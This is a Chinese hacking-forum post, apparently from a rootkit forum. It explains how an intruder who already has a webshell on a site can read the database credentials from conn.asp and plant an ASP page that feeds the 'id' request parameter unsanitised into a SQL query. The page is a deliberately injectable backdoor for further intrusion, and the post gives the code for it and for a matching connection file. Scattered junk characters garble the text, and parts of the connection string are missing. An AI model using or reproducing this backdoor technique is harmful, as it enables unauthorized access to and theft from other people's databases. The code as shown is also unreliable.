自己构造注入点方便入侵8 I! v1 _# D, s; Z# y
/ y: S' Z( v, t% E今天看了rootkit论坛里面有人要我写出来关于伪造一个注入点,然后方便渗透,找到更多的可利用的信息
" v9 t( A* I$ I3 ]+ c! c+ E4 t+ r8 S' R9 o4 T' I4 Y0 w, l
这两天一直考试,想了下,就先仍出来,有什么问题可以提出来,我们一起讨论!
* `8 @. i/ G, B
* R& s- Z7 w3 s首先你要拿了一个webshell,这样你找到连接数据库的文件,大多都是conn.asp这个文件里面有mssql的用户和
1 ~6 R q, P. }2 i
9 Q: S! e- W$ y. V密码,你要找到用户名、密码、数据库所在的IP,然后连接上去,至于连接大家应该都会,找到网站管理员的表7 T s3 p, ]3 K
; n5 X# {, R, N$ ]/ r# R5 o! d
因为我测试的时候是用管理员的表,我朋友说任何表名都可以,只要这个表存在,代码如下:3 J* b i4 }2 \* z( n* f
, u) T- r9 J2 s3 J- h5 _5 K# [
程序代码+ j( L7 p% e$ J
<!--#include file="xx.asp"-->3 A+ l: g. V+ z6 C
<%
8 k7 z! f8 K% P8 `& p0 e+ eset rs=server.createobject("ADODB.recordset")
1 r1 M4 z$ |5 Y' _' L3 L) }id = request("id")& v) _: @% Z, g5 |
strSQL = "select * from admin where id=" & id! [) J# J$ s+ }( ]1 n5 [; X
rs.open strSQL,conn,1,3! H; R! { g: ]! D
rs.close$ C* _0 z1 p6 Z/ F4 F8 g: B
%>) w; X* U8 n0 o
' G) n9 [4 P' g8 ^# N% U把strSQL = "select * from admin where id=" & id 这句话里面的admin换成要伪造的表名,注意必须存在
' D; b5 Z2 A! Z6 J. x' X9 g, B/ z3 ~, z E% N5 c
你可以连接上去看下表名就是了!这里假设的是admin是表名!这个文件名随便保存!2 F( }" d; R' f' t2 X" N! q& b
+ g+ L4 W! c( C8 y+ s5 N然后就要构造一个连接数据库的文件了,代码如下:- U* j& k0 T1 l- S6 g: b3 R, h7 n0 w
程序代码
) I) t7 P# N3 E7 W' E/ _+ O<% ) o& V$ A* x7 A6 @
strSQLServerName = "000.000.000.000" '服务器名称或地址5 B+ M* N8 ~' b7 n1 x! K& l* j
strSQLDBUserName = "sqlname" '数据库帐号
2 O# J# _% M+ G. d! C) J' @; NstrSQLDBPassword = "sqlpass" '数据库密码. w7 B9 z" `! c! W" i2 n) ?
strSQLDBName = "sqldataname" '数据库名称
+ N( X# l+ W' z x! ^) @Set conn = Server.CreateObject("ADODB.Connection")# B5 P5 f1 j: I+ Y. N: J
strCon = " rovider=SQLOLEDB.1 ersist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & " assword=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";"9 W2 S$ H5 g: X( M2 T, n
conn.open strCon& G/ R9 f+ M9 E
%>
# A9 B- |/ T! n# F' [% _) z# o, f8 f! E. ~
这里应该都会了,就不罗嗦了,不过注意的是保存的文件名要和include调用的名字一样。。还是罗嗦话,
! ^* W) [% a. R3 `7 k, |0 M" C& g+ o# S1 T4 R
就这样,正常情况下,就OK了,伪造成功……
+ V0 p9 n8 E. v! J& _9 h G! `2 w0 j; S5 [$ D8 E, A8 C
如果有什么问题可以提出来大家一起探讨解决。 |